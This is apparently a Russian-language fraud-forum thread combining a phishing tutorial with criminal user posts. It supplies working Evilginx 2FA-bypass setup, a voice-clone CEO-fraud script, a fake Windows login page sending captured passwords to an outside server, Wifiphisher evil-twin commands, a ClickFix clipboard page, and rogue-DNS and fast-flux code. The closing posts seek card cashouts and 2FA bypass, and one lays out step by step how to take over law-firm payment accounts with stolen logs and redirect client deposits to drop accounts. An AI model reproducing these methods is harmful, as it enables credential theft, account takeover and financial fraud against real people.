- Обучите ИИ имитировать голос:
Code:Copy to clipboard
descript clone --voice-sample path/to/voice_sample.wav --output voice_model
- Сгенерируйте звуковой фрагмент с использованием клонированного голоса:
Code:Copy to clipboard
descript synthesize --model voice_model --text "Please approve this fund transfer by end of day."
Вишинг-атака: Злоумышленник использует сгенерированный ИИ голос для совершения телефонных звонков или отправки голосовых сообщений, притворяясь руководителем или менеджером. Например, злоумышленник может позвонить сотруднику и дать указание перевести деньги или предоставить конфиденциальные данные.
Пример сценария голосового сообщения:
Code:Copy to clipboard
"Hi, this is your CEO. I’m in an urgent meeting and need you to transfer $15,000 to this account right away. I'll send you the details shortly via email. Thanks!"
Методы предотвращения фишинга с использованием поддельного голоса
- Аутентификация по голосовой биометрии: используйте инструменты
аутентификации по голосовой биометрии для проверки личности звонящих.
Инструменты, такие как Nuance и Pindrop, могут обнаруживать аномалии в
голосовых паттернах.
- Протоколы обратного вызова: внедрите строгие политики обратного вызова,
согласно которым сотрудники обязаны подтверждать любые финансовые или
конфиденциальные запросы, перезванивая по известному и доверенному номеру
телефона.
- Обнаружение голосов с помощью ИИ в реальном времени: современные
инструменты ИИ могут анализировать входящие звонки в реальном времени, чтобы
определить, является ли голос синтетическим или сгенерированным, что помогает
выявлять подозрительные звонки.
2FA
Evilginx 3.0 — это мощный инструмент, используемый для проведения продвинутых фишинговых атак, специально разработанный для обхода двухфакторной аутентификации (2FA). Он функционирует как обратный прокси, перехватывая и передавая коммуникацию между жертвой и легитимной службой. Это позволяет злоумышленникам захватывать учетные данные для входа и токены аутентификации, даже когда жертва использует 2FA, включая одноразовые пароли, основанные на времени (TOTP), и SMS-2FA.
Вот как Evilginx 3.0 может быть использован для проведения фишинговой атаки с обходом двухфакторной аутентификации (2FA), а также механизмы защиты.
Сценарий атаки: Использование Evilginx 3.0 для фишинга и обхода двухфакторной аутентификации (2FA)
Настройка и конфигурация: Evilginx выступает в роли посредника (MITM) между жертвой и легитимной страницей входа. Он может перехватывать как имя пользователя и пароль, так и токен сеанса, который генерируется после успешной аутентификации с использованием двухфакторной аутентификации (2FA).
Code:Copy to clipboard
phishlets hostname google phishingdomain.com
phishlets enable google
lures create google
- Evilginx теперь клонирует страницу входа Google на домене
phishingdomain.com
.
Создайте фишинговый URL : После активации фишлета и приманки Evilginx генерирует фишинговый URL, который будет перенаправлять жертв на поддельную страницу входа.
Code:Copy to clipboard
lures get-url 0
- Этот URL будет похож на настоящую страницу входа и использовать HTTPS для убедительной фишинговой атаки.
Проведение фишинговой атаки
- Отправка фишингового URL: Злоумышленник отправляет фишинговый URL жертве по
электронной почте, SMS или с помощью методов социального манипулирования.
Например:
- Фишинговое письмо:
Code:Copy to clipboard
Subject: Urgent: Unusual Login Attempt
Hi,
We detected an unusual login attempt on your Google account. Please click the link below to verify your identity:
https://phishingdomain.com/google/login
Regards,
Google Security Team
- Жертва вводит учетные данные: Когда жертва нажимает на ссылку, она
перенаправляется на клонированную страницу входа, размещенную на Evilginx.
Жертва вводит свои учетные данные и отправляет код двухфакторной
аутентификации.
- Evilginx перехватывает учетные данные и токен 2FA: Evilginx перехватывает
имя пользователя, пароль и токен 2FA (одноразовый пароль) и передает их на
легитимный сервис. Сервис отправляет обратно куки сессии, которые также
перехватывает Evilginx.
Code:Copy to clipboard
[201.202.45.12] [google] [user@gmail.com] [password123]
[google] Session cookie captured: GA1.2.1234567890.session
Механизмы защиты от фишинга с использованием Evilginx и обхода 2FA
Защита от таких сложных фишинговых атак требует многоуровневого подхода:
Используйте аппаратные ключи FIDO2/WebAuthn : Хотя Evilginx может обойти традиционные методы двухфакторной аутентификации (TOTP, SMS и т. д.), аутентификация на основе аппаратных средств с использованием FIDO2 или WebAuthn не может быть обойдена атаками "человек посередине". Эти устройства генерируют криптографический ключ, специфичный для каждой сессии, что делает его невозможным для кражи.
- Пример: YubiKey или Google Titan Key.
Атака с использованием гомографов и атака типосквоттинг
Атаки с использованием гомографов в фишинге
Атака с использованием гомографов — это тип фишинг-атаки, который использует визуальное сходство между символами из разных наборов символов (обычно Unicode), чтобы создать вредоносные URL-адреса, которые выглядят почти идентично легитимным. Злоумышленники используют эти обманчивые URL-адреса, чтобы обмануть пользователей и заставить их посетить вредоносные сайты, полагая, что это легитимный домен. Эта техника особенно опасна, поскольку пользователи могут не заметить тонкие различия между легитимными и вредоносными URL-адресами.
Рассмотрим легитимный домен apple.com. Злоумышленник может создать
вредоносный URL, такой как аррle.com , где символы а
и р
на самом деле
являются кириллическими буквами вместо латинских символов, используемых в
легитимном домене. Для неподготовленного взгляда оба URL выглядят идентично,
но они указывают на разные сайты.
Инструменты для атак с использованием гомографов
Злоумышленники могут использовать несколько онлайн-инструментов или скриптов для генерации гомографических URL. Например, с помощью библиотеки Python idna (Международные доменные имена в приложениях) злоумышленник может преобразовать символы Unicode в Punycode для регистрации схожих доменных имен.
Пример создания гомографического домена на Python:
Code:Copy to clipboard
import idna
# Original domain
original_domain = "apple.com"
# Create a homograph domain using Cyrillic letters
homograph_domain = "аррle.com"
# Convert homograph domain to Punycode
punycode_domain = idna.encode(homograph_domain).decode()
print(f"Homograph domain in Punycode: {punycode_domain}")
Результат:
Code:Copy to clipboard
Homograph domain in Punycode: xn--80ak6aa92e.com
Тайпосквоттинг в фишинге
Тайпосквоттинг — это еще одна форма фишинговой атаки, при которой злоумышленник регистрирует доменные имена, схожие с легитимными доменами, но содержащие опечатки или небольшие вариации. Цель заключается в том, чтобы использовать распространенные ошибки ввода, которые пользователи совершают при вводе URL-адресов. URL-адреса с тайпосквоттингом часто имитируют популярные веб-сайты, обманывая пользователей и заставляя их верить, что они находятся на легитимном сайте.
Легитимным доменом может быть google.com , но тайпосквоттер может зарегистрировать gooogle.com (с лишней "o"). Если пользователь случайно введет неправильный URL, он может попасть на фишинговый сайт, созданный для кражи его информации.
Злоумышленники также используют тайпосквоттинг для фишинговых атак по
электронной почте, создавая письма, которые выглядят так, будто они приходят с
легитимных доменов, но немного изменены. Например, письмо от
support@paypal.com
может быть подделано как support@paypai.com
.
Инструменты для атак с использованием тайпосквоттинга:
Одним из полезных инструментов для тестирования и генерации доменов для тайпосквоттинга является PhishiUrl , доступный на GitHub. Этот инструмент автоматизирует создание тайпосквоттированных или схожих доменов, которые можно использовать для фишинга или в рамках атак красной команды.
Пример использования PhishiUrl:
Code:Copy to clipboard
git clone https://github.com/EmadYaY/PhishiUrl.git
cd PhishiUrl
python3 phishiurl.py --domain google.com --type squatting
domains to identify phishing URLs, aimed at assisting cybersecurity professionals in recognizing and mitigating homograph attacks. ](https://github.com/EmadYaY/PhishiUrl)
A tool for generating and detecting Unicode domains to identify phishing URLs, aimed at assisting cybersecurity professionals in recognizing and mitigating homograph attacks. - EmadYaY/PhishiUrl
github.com
Страница фишинга уровня ОС
Фишинговые атаки могут нацеливаться на учетные данные операционной системы (ОС), имитируя страницу входа, которая выглядит аутентично для пользователя. Этот документ предоставляет пример того, как создать фишинговую страницу, которая имитирует экран входа в ОС для Windows, macOS и Linux. Цель состоит в том, чтобы получить учетные данные пользователя, когда он вводит свои данные в кажущуюся легитимной форму входа.
Вот руководство по созданию и развертыванию фишинговых страниц для каждой операционной системы:
Фишинговая страница для Windows OS
Описание : Эта фишинговая страница имитирует экран входа в Windows 10 и захватывает учетные данные с помощью JavaScript. Она разработана для работы в киосковом режиме, чтобы предотвратить выход пользователей из приложения.
Инструкции по настройке:
Создайте index.html
: Этот HTML-файл должен содержать форму входа,
стилизованную под экран входа в Windows 10. Он захватывает ввод пользователя и
отправляет его на сервер.
Code:Copy to clipboard
<!DOCTYPE html>
<html>
<head>
<title>Windows 10 Login</title>
<style>
body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background-color: #1a1a1a;
color: white;
text-align: center;
padding-top: 20%;
}
.login-container {
background-color: #2d2d2d;
border-radius: 8px;
display: inline-block;
padding: 20px;
}
input[type="text"], input[type="password"] {
padding: 10px;
margin: 10px;
border-radius: 5px;
border: none;
width: 200px;
}
input[type="submit"] {
padding: 10px 20px;
border-radius: 5px;
border: none;
background-color: #0078d7;
color: white;
cursor: pointer;
}
</style>
</head>
<body>
<div class="login-container">
<h1>Windows 10</h1>
<form id="login-form">
<input type="text" id="username" placeholder="Username" required><br>
<input type="password" id="password" placeholder="Password" required><br>
<input type="submit" value="Sign in">
</form>
</div>
<script>
document.getElementById('login-form').addEventListener('submit', function(e) {
e.preventDefault();
var username = document.getElementById('username').value;
var password = document.getElementById('password').value;
fetch('http://yourserver.com/collect', {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: 'username=' + encodeURIComponent(username) + '&password=' + encodeURIComponent(password)
}).then(response => response.text())
.then(data => console.log(data));
// Redirect or show an error after submission
alert('Invalid password. Please try again.');
});
</script>
</body>
</html>
Запустите в киосковом режиме : Запустите фишинговую страницу в киосковом режиме, чтобы предотвратить выход пользователей.
- Chrome:
Code:Copy to clipboard
"C:\Program Files\Google\Chrome\Application\chrome.exe" --kiosk file:///path/to/index.html
- Edge :
Code:Copy to clipboard
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk file:///path/to/index.html --edge-kiosk-type=fullscreen
- Firefox :
Code:Copy to clipboard
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk file:///path/to/index.html
for your red team exercises ](https://github.com/marduc812/Win10CredsThief)
A Windows 10 login phishing page for your red team exercises - marduc812/Win10CredsThief
github.com
Запрос разрешения, например, на использование камеры
Слой интерфейса, например, Framework для злонамеренной точки доступа
Wifiphisher — это универсальный инструмент, используемый в рамках красной команды и оценки безопасности Wi-Fi для проведения сложных фишинговых атак через беспроводные сети. Этот фреймворк позволяет тестировщикам на проникновение создавать злонамеренные точки доступа и выполнять различные атаки для захвата конфиденциальной информации или распространения вредоносного ПО. Вот подробный обзор его функций и принципа работы:
1. Достижение позиции "человек посередине" (MITM)
Начальная фаза фишинга через Wi-Fi заключается в том, чтобы занять позицию
между целевыми клиентами и легитимной сетью. Wifiphisher использует несколько
техник для достижения этой цели:
- Атака "Злой близнец": Создает поддельную точку доступа с тем же SSID,
что и легитимная сеть, обманывая клиентов и заставляя их подключаться к ней.
- Атака KARMA : Имитирует публичную сеть, к которой клиенты часто
подключаются, заманивая их к подключению к поддельной точке доступа.
- Атака известных маяков : Передает список распространенных SSID, к
которым ранее подключались близлежащие устройства, увеличивая шансы на
успешное подключение.
Чтобы повысить эффективность этих атак, Wifiphisher нарушает существующие
соединения, используя пакеты деаутентификации или разъединения, заставляя
клиентов переподключаться и потенциально присоединяться к поддельной точке
доступа.
2. Проведение фишинговых атак
Оказавшись в позиции "человек посередине" (MITM), Wifiphisher можно
использовать для проведения различных фишинговых атак и распространения
вредоносного ПО:
- Веб-фишинг : Создание и предоставление поддельных страниц входа для
захвата учетных данных у ничего не подозревающих пользователей. Например,
имитируя менеджер сети Windows, Wifiphisher может обмануть пользователей,
заставив их ввести свой WPA/WPA2 Pre-Shared Key.
- Распространение вредоносного ПО : Можно настроить сложные сценарии для
доставки вредоносных программ на устройства жертв. Например, сценарий
«Обновление прошивки» может побудить пользователей скачать вредоносный
исполняемый файл, замаскированный под обновление прошивки.
Выполнение атаки «Злой близнец» с использованием пользовательского сценария:
Code:Copy to clipboard
wifiphisher -aI wlan0 -jI wlan4 -p firmware-upgrade --handshake-capture handshake.pcap
Автоматическое нацеливание на конкретную сеть и сценарий:
Code:Copy to clipboard
wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rd
Запуск открытой сети с сценарием входа через OAuth:
Code:Copy to clipboard
wifiphisher --essid "FREE WI-FI" -p oauth-login -kB
](https://github.com/wifiphisher/wifiphisher)
The Rogue Access Point Framework. Contribute to wifiphisher/wifiphisher development by creating an account on GitHub.
github.com
Проверьте, но как хакер, ClickFix
Метод фишинга с поддельным reCAPTCHA включает в себя создание фишинговой страницы, которая имитирует законную форму проверки reCAPTCHA, чтобы обмануть пользователей и заставить их выполнить вредоносные команды на своих системах. Эта техника использует знакомство и доверие пользователей к формам reCAPTCHA, чтобы обойти их инстинкты безопасности.
Сценарий атаки:
1. Создание приманки :
- Злоумышленник создает поддельную страницу reCAPTCHA, которая предлагает
пользователям "Подтвердить, что вы человек." Эта фишинговая страница выглядит
очень похожей на настоящую страницу Google reCAPTCHA.
- Страница содержит кнопку или форму, при взаимодействии с которой
пользователям предлагается открыть диалоговое окно "Выполнить" (Win+R) и
вставить команду, скопированную в буфер обмена фишинговой страницы.
2. Исполнение :
- Как только пользователь вставляет команду, она выполняется на его системе.
Эта команда может быть вредоносным скриптом или программой, предназначенной
для кражи учетных данных, установки вредоносного ПО или выполнения других
вредоносных действий.
- Фишинговая страница может содержать ложные сообщения об ошибках или
дополнительные запросы, чтобы удержать пользователя и убедить его выполнить
команду.
3. Пример реализации : Репозиторий, который вы упомянули, предоставляет
пример того, как настроить такую фишинговую страницу. Файл index.html
включает CSS и JavaScript для создания поддельного интерфейса reCAPTCHA и
механизма для выполнения команд.
Code:Copy to clipboard
<!DOCTYPE html>
<html>
<head>
<title>Verify You Are Human</title>
<style>
body {
font-family: Arial, sans-serif;
text-align: center;
padding-top: 20%;
background-color: #f1f1f1;
}
.container {
background: white;
border-radius: 8px;
padding: 20px;
box-shadow: 0 0 10px rgba(0,0,0,0.1);
display: inline-block;
}
.button {
padding: 15px 30px;
border: none;
background: #4285f4;
color: white;
font-size: 16px;
cursor: pointer;
border-radius: 5px;
margin: 10px;
}
</style>
</head>
<body>
<div class="container">
<h2>Verify you are human</h2>
<button class="button" onclick="showVerifyWindow()">Verify</button>
</div>
<script>
function showVerifyWindow() {
var command = 'your-malicious-command-here'; // Replace with your malicious command
var verificationCode = '7624'; // Example code, can be randomized
// Show a fake reCAPTCHA window
alert('Validation in the Run box to "hide" the command (✅ "I am not a robot - reCAPTCHA Verification ID: ' + verificationCode + '")');
// Clear clipboard (this is just a placeholder for the real implementation)
navigator.clipboard.writeText(command).then(function() {
alert('Command copied to clipboard. Open the Run dialog (Win+R) and paste it to continue.');
});
}
</script>
</body>
</html>
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F34dd48831adfb54ee48eac6861423fe8f0229c41568c3f6eebfad6a07c0af170%2FJohnHammond%2Frecaptcha- phish&hash=91fb0d640f7d5d7badff7b88cc1d01a4&return_error=1)
](https://github.com/JohnHammond/recaptcha-phish)
Phishing with a fake reCAPTCHA. Contribute to JohnHammond/recaptcha-phish development by creating an account on GitHub.
github.com
Истекший, но нужен хакеру
Охотник за доменами
- Цель: Этот инструмент помогает выявлять истекшие или доступные домены,
которые ранее использовались для безобидных целей и могут быть
переиспользованы для фишинга или задач управления и контроля (C2).
- **Особенности:
** - Извлекает недавно истекшие домены с сайта ExpiredDomains.net.
- Проводит проверки репутации с использованием таких сервисов, как Symantec
Site Review, IBM X-Force и Cisco Talos.
- Выводит результаты в текстовом и HTML-форматах с ссылками на источники
репутации и записи в Archive.org.
- **Примеры использования:
**- ./domainhunter.py -k apples -c --ocr -t5
– Ищет истекшие домены,
связанные с "apples", проверяет их репутацию и обрабатывает CAPTCHA.
- ./domainhunter.py --single mydomain.com
– Выполняет детальную проверку
репутации для одного домена.
- python3 ./domainhunter.py -r 1000
– Извлекает и проверяет репутацию для
1000 недавно истекших доменов.
categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ](https://github.com/threatexpress/domainhunter)
Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names - threatexpress/domainhunter
github.com
Хайджинг DNS
DNS Hijacking , также известный как DNS-редирект, — это техника, используемая для манипуляции процессом разрешения доменных имен. Подрывая способ, которым доменные имена преобразуются в IP-адреса, злоумышленники могут перенаправлять трафик на вредоносные сайты, блокировать доступ к законным ресурсам или перехватывать и манипулировать сетевым трафиком. Эта техника часто используется в фишинговых атаках, чтобы обмануть пользователей и заставить их посетить мошеннические веб-сайты, которые выглядят законными.
1. Редирект на злонамеренные DNS-серверы
- Злоумышленники могут настроить вредоносное ПО так, чтобы изменить настройки
DNS компьютера, чтобы использовать злонамеренный DNS-сервер, который они
контролируют. Этот сервер может затем перенаправлять запросы на вредоносные
сайты, созданные для имитации законных.
- Например, когда пользователь пытается посетить bank.com, злонамеренный DNS-
сервер может перенаправить его на фишинговый сайт, который выглядит идентично
настоящему сайту банка.
2. Компрометация доверенных DNS-серверов
- Злоумышленники также могут компрометировать или использовать уязвимости
доверенных DNS-серверов, чтобы изменить ответы, которые они предоставляют. Это
может включать внедрение вредоносных записей в кэш DNS или изменение DNS-
записей.
- Например, злоумышленник может изменить DNS-запись для paypal.com, чтобы она
указывала на фишинговый сайт вместо легитимного сайта PayPal.
3. Атаки "Человек посередине"
- Перенаправляя DNS-запросы на сервер, который они контролируют,
злоумышленники могут перехватывать и изменять веб-трафик между пользователями
и целевыми сайтами. Это может привести к краже данных или новым попыткам
фишинга.
4. Манипуляция со стороны интернет-провайдера или поставщика DNS
- Интернет-провайдеры или поставщики DNS могут перенаправлять пользователей
на свои собственные веб-серверы для размещения рекламы или других целей. Хотя
это менее зловеще, чем злонамеренное захват DNS, это все равно может повлиять
на пользовательский опыт и конфиденциальность.
Влияние на фишинг
- Обманчивые веб-сайты : захват DNS позволяет злоумышленникам создавать
фишинговые сайты, которые выглядят идентично легитимным веб-сайтам, обманывая
пользователей и заставляя их вводить конфиденциальную информацию, такую как
учетные данные для входа или финансовые данные.
- Сбор учетных данных : перенаправляя пользователей на поддельные
страницы входа, злоумышленники могут собирать имена пользователей, пароли и
другую личную информацию.
- Социальная инженерия : злоумышленники могут использовать захваченные
домены для отправки убедительных фишинговых писем, которые содержат ссылки на
их вредоносные сайты, что повышает вероятность успешных атак.
Обнаружение и предотвращение
1. Мониторинг и безопасность DNS
- Внедрите инструменты мониторинга DNS для обнаружения подозрительных
изменений в записях DNS или необычных паттернов трафика.
- Используйте расширения безопасности DNS (DNSSEC), чтобы гарантировать, что
ответы DNS являются подлинными и не были изменены.
Пример сценария для захвата DNS
Вот фрагмент кода на Python, иллюстрирующий, как злоумышленник может изменить настройки DNS на компьютере с Windows, используя команду netsh. Этот код предназначен только для образовательных целей и демонстрирует, как злоумышленники могут модифицировать настройки DNS.
Code:Copy to clipboard
import subprocess
# Replace with the IP address of the rogue DNS server
rogue_dns_server = "10.0.0.1"
# Get the current DNS server settings
current_dns_servers = subprocess.check_output(["netsh", "interface", "ip", "show", "dnsservers"])
# Modify the DNS server settings to point to the rogue DNS server
subprocess.call(["netsh", "interface", "ip", "add", "dnsservers", "Wi-Fi", rogue_dns_server])
# Confirm that the DNS server settings have been changed
new_dns_servers = subprocess.check_output(["netsh", "interface", "ip", "show", "dnsservers"])
print(new_dns_servers.decode())
hijacking/)
unprotect.it
Fast Flux
Fast Flux - это продвинутая техника, используемая киберпреступниками для сокрытия местоположения своих фишинговых и вредоносных сайтов. Постоянно изменяя IP-адреса, связанные с доменом, быстрый флюкс усложняет задачу командам безопасности и правоохранительным органам по отслеживанию и закрытию этих вредоносных сайтов. Эта техника использует сеть скомпрометированных хостов в качестве прокси-серверов, что увеличивает устойчивость и анонимность ботнета.
1. Динамические DNS-записи
- Fast Flux основывается на динамических DNS-записях, которые часто изменяют
IP-адреса, связанные с доменом. Каждый раз, когда выполняется DNS-запрос,
ответ может содержать разные IP-адреса, что затрудняет определение
фактического местоположения вредоносного сервера.
2. Ботнет скомпрометированных хостов
- Эта техника использует большую сеть скомпрометированных компьютеров, часто
являющихся частью ботнета, для работы в качестве прокси. Эти
скомпрометированные хосты постоянно меняются в DNS-записях, что обеспечивает
быструю смену IP-адресов.
3. Сетевое взаимодействие "равный к равному"
- Fast Flux может сочетаться с сетевым взаимодействием "равный к равному"
(P2P), где узлы ботнета общаются друг с другом напрямую. Это увеличивает
сложность отслеживания и разрушения сети.
4. Распределенное управление и контроль (C2)
- Распределяя инфраструктуру управления и контроля по множеству узлов, Fast
Flux повышает устойчивость ботнета. Если один узел отключается, другие
продолжают функционировать, сохраняя контроль над скомпрометированными хостами
и фишинговыми операциями.
5. Веб-ориентированное распределение нагрузки
- Fast Flux часто включает в себя веб-ориентированное распределение нагрузки
для распределения трафика между несколькими прокси. Это усложняет блокировку
или фильтрацию вредоносного трафика, так как IP-адреса и конечные точки
постоянно меняются.
6. Прокси-перенаправление
- Вредоносные сайты, использующие Fast Flux, часто перенаправляют
пользователей через несколько прокси-серверов. Это может дополнительно скрыть
истинное местоположение сайта фишинга или доставки вредоносного ПО.
Пример сценария для симуляции Fast Flux
Вот фрагмент кода на Python, который демонстрирует упрощенную симуляцию того, как DNS-сервер может обрабатывать Fast Flux, возвращая несколько IP-адресов для заданного домена. Этот пример использует модули dnslib и socket для выполнения DNS-операций.
Code:Copy to clipboard
import dnslib
import socket
# Replace with the IP address of the DNS server
dns_server = "8.8.8.8"
# Replace with the domain name that you control
domain_name = "example.com"
# Replace with the IP addresses of the compromised hosts that will act as proxies
proxy_addresses = ["10.0.0.1", "10.0.0.2", "10.0.0.3"]
# Create a DNS query for the domain name
query = dnslib.DNSRecord.question(domain_name)
# Send the DNS query to the DNS server
dns_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
dns_socket.sendto(query.pack(), (dns_server, 53))
# Receive the DNS response from the DNS server
response = dnslib.DNSRecord.parse(dns_socket.recv(4096))
# Modify the DNS response to include the IP addresses of the compromised hosts
response.add_answer(*dnslib.RR.fromZone(f"{domain_name} A " + " ".join(proxy_addresses)))
# Simulate sending the modified DNS response back to the client (note: this requires actual client address and port)
client_address = ("client_ip", 12345) # Replace with actual client address and port
dns_socket.sendto(response.pack(), client_address)
flux/)
unprotect.it
Рефлексивная загрузка файлов
Рефлексивная загрузка файлов — это сложная техника фишинга, при которой злоумышленники используют легитимный сервис или сайт для распространения вредоносных файлов. Эта техника включает обман пользователей, заставляя их загружать файлы, которые выглядят как исходящие из доверенного источника, но на самом деле предназначены для компрометации их систем.
1. Эксплуатация доверенных источников.
- Злоумышленники используют скомпрометированные или легитимные веб-сайты для
размещения или ссылки на вредоносные файлы. Эти источники часто вызывают
доверие у жертвы, что делает попытку фишинга менее подозрительной.
2. Скрытие и вводящая в заблуждение информация.
- Вредоносный файл часто маскируется под легитимный документ, такой как PDF,
файл Word или исполняемый файл. Файл может содержать макросы, скрипты или
другие типы вредоносного ПО, предназначенные для эксплуатации уязвимостей в
системе жертвы.
3. Механизм доставки.
- Вредоносный файл обычно доставляется через вложения в электронных письмах,
ссылки в фишинговых письмах или через скомпрометированные легитимные сайты.
Электронное письмо или сообщение часто содержит убедительное содержание, чтобы
убедить пользователя скачать и открыть файл.
4. Исполнение и полезная нагрузка.
- Как только пользователь скачивает и открывает файл, он может выполнить
вредоносный код, который может украсть учетные данные, установить
дополнительное вредоносное ПО или использовать уязвимости системы.
Символ RTLO
Символы управления Right-to-Left Override (RTLO)
— это тип символов
Unicode, которые могут быть использованы в фишинговых атаках для обмана
пользователей и скрытия истинной природы вредоносных файлов или ссылок. Вот
подробный обзор того, как символы RTLO могут использоваться в фишинге и какие
последствия это имеет для безопасности.
RTLO расшифровывается как Right-to-Left Override , что является символом управления Unicode, используемым для изменения направления текста. Он в основном применяется в языках, которые пишутся справа налево, таких как арабский или иврит. Символ RTLO позволяет отображать текст в противоположном направлении относительно стандартной системы письма.
- Unicode значение: U+202E
- Функция: Он изменяет порядок символов, следующих за ним, эффективно
заставляя текст отображаться в формате справа налево.
Как RTLO используется в фишинге
Символы RTLO могут быть злонамеренно использованы для маскировки истинной
природы имен файлов, URL-адресов или адресов электронной почты. Вот как они
обычно используются в фишинговых атаках:
1. Сокрытие расширений файлов :
- Пример: Файл с именем document.pdf
может быть замаскирован так, чтобы
выглядеть как document.pdf
, с символом RTLO, вставленным перед .pdf
, что
делает его похожим на document.pdf
, но на самом деле это может быть
document.exe
или другой исполняемый файл. Это может ввести пользователей в
заблуждение и заставить их скачать или открыть файлы, которые на самом деле
являются вредоносными.
2. Обманчивые URL-адреса :
- Пример: Нападающий может использовать RTLO, чтобы замаскировать URL-адрес,
заставляя его выглядеть как легитимный веб-сайт, но на самом деле он будет
вести на фишинговый сайт. Например, URL-адрес может выглядеть как example.com,
но с помощью RTLO он может быть замаскирован как example.com.
3. Обманчивые адреса электронной почты :
- Пример: RTLO может быть использован для создания обманчивых адресов
электронной почты. Адрес может выглядеть как
support@yourbank.com, но на самом деле это
support@yourbank.com, когда используется символ
RTLO, что приводит к путанице и потенциальному фишингу.
Примеры сценариев использования RTLO
1. Скрытие имени файла :
- Оригинал: report.docx
- Скрытое: report.docx
(где .docx
перевёрнуто, чтобы выглядеть как
xcod.
)
2. Пример фишингового URL :
- Оригинал: https://secure-bank.com
- Зашумленный: https://secure-bank.com
(где фактический домен может
отличаться из-за RTLO)
Контрольный список безопасности
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F759a71677bdfddb6b6d8b2b34699c339d03f34ce354ba567135fe520da1c7f3f%2Fhoangcuongflp%2FEmail- Security-Checklist&hash=c4103b169e9ceba26935f739087ab89f&return_error=1)
servers, locked down your website and are ready to take on the internet. But all your hard work was in vain, because someone fell for a phishing email and wired money to a scammer, ](https://github.com/hoangcuongflp/Email-Security- Checklist)
You’ve hardened your servers, locked down your website and are ready to take on the internet. But all your hard work was in vain, because someone fell for a phishing email and wired money to a scam...
github.com
Доброе утро граждани мошенники!
Имеется на постоянной основе СС+смс куда деть мат для максимального профита?
Интересует обнал, может есть способы, кроме как отдать нальщикам за
%
Сейчас бьем вещи. Или может кроме обнала подскажете другие способы списания $
Буду рад любому совету опытных
аферистов
Есть электронный адрес, пароль, имя жертвы. Но двухфакторка не дает зайти. Может можно украсть cookie от почты, отправив фишинговое письмо человеку? Пароль мне не нужен, нужно только каким-то образом обойти двухфакторку
scam page that send logs to telegram
phish ccs and login
И так, господа! Возник интересный вопрос, каким образом или методом возможно
занести информацию в БГ репорт. Откуда то ведь выгружается данная информация?
Фо экземпл, арендованный номер, саморег емейл, адрес + зип и так далее?
Hey I'm looking for someone who can send SMS with a link to both US and EU. Need like 500 that's all. Post a comment below or message me please thank you!
Я не один из вас, наборот, я стараюсь понять как то что вы создали выживает и
у меня возниклки некоторые вопросы. Не призываю никого расписывать свои "пупер
сехретные техники"
1. Зачем именно Hetzner? В чём фишка?
2. Что за темка с TLD .one,.shop,.sbs
3. Кроме удобности, зачем вам телеграм?
Также, я недавно нашел панель фишеров, довольно старый, где
карты/работники/рефералы:
Code:Copy to clipboard
Воркер:
АЙДИ:
Объявление:
Цена:
Статус:
Взято:
СМС:
Кабинет:
Код звонка:
4. Если есть платфома для всего этого, зачем ищут вбиверов?
Здравствуйте.
Народ дайте пожалуйста годный хороший материал для изучения по теме того как
разводить чуваков на сайтах знакомств и т.п.
Прошу для себя.
Feel free to ask me any question about spamming , i 'll answer as much as i can
вопрос о дропах, кто-то работал с ними или есть опыт работы, может кто-то
работает
есть выхлоп и какие акки лучше на них регать
речь идёт про регистрацию аккаунтов, не про кредит и т.п
I always see posts on forums with people looking to buy "methods" and my inbox is filled with this also. This might seem like an easy and fast way for beginners but you would benefit much more from developing your own. I do not see anyone sharing this info so I will share my methodologies with you. This is a basic beginner lesson on fraud methodology, the building blocks to create your own unsaturated and private methods and be capable and independent and dangerous without relying on anything but your mind. If this is popular i will post more on this for intermediate and advanced perhaps.
I work in fraud only as a hobby now and passion but it was my first love and when i started this work there were no methods to buy or be given, just instruction and some tips. You usually worked as a drop to establish trust and rep before any advice would be given in those days. Most worked revolved around carding and reships then, were not discussing this today. Today i will give you a valid and working foundation that you can use as a framework to develop your own private and unique methods forever. This is not a method, this is one way that methods are made.
So where to begin? Creativity helps, without a creative mind you can still
succeed but creativty is like having a cheat code. If you are not creative
then here are some shortcuts:
A. Search reddit for posts with keywords like account hacked, wallet hacked, bank hacked, bad security app, no otp, no 2fa, deposit stolen, deposit redirected and things along these lines. Look at the newest posts and skim the story and comments. Often you will find a target to explore and the weakness already explained from the users complaint . In the comments many times users will complain the same security issues exists with their bank/store/payroll/ etc as well.
B. Check credit/points/miles/churning blogs like drofcredit. I've found many easy gems there before anyone knew about or abused them. Cardless.com, shopyourway.com/giftcards made $100k+ with this one and wrote this article, $75 uber vouchers exploit i looped for hundreds of them in less than 24 hours, all kinds of referral programs that i checked and found it worthwhile to automate and much more. New programs and partnerships often have bugs and flaws you can exploit and following these blogs keeps you in front of the line.
C. Take an idea of some method you used to know and remix it for a new one easily. This is the easiest and quickest and most overlooked way for beginners and i recommend it. For example if you used to work with payment processors and cashouts like stripe or whatever oversaturated crap then take a moment and break it down into pieces and check google. Search for something like "payment processors for attorneys". So now you have specific niche results and a new but familiar world opens up to you.
We see our first result is a website called clio. Grab some logs with this domain and test logging in for security like otp or unrecognized device. After brief testing we see there is no security when logging in and can try unlimited attempts no problem!
We find an account with recent pay history from clients:
We use our brains and explore to find where payments are deposited and can
we edit it to our drops easily and unnoticed:
'
So far this is looking quite promising and we are finding this live, took 5 minutes while writing this post and i share with you.
From here we attach our bank drop, but first we check settings for
notifications and disable, if there is a mobile app we login and check again
for notificxations disabled.
For something like this I recommend cashapp drops with account/routing number
since payments are not high and cashapp accepts anyname deposits up to 25k
mismatch is fine.
We leave all the details the same but input our account+routing and save. Then
enable notifications once more. We do this to as many as possible to get
proper test results and see
how much simple abuse we can do to make our job easier.
We check in a few days for direct deposits from clio. Then we collect the lawyers money until he notices and cuts us off.
This is a very small example of a very large and diverse field that it is very easy to have success in as long as you arent lazy, or stupid and are honest with yourself and where you stand. Dont lie or exaggerate, and never offer advice or post help on topics you have not mastered and are certain your are not supplying misinformation.
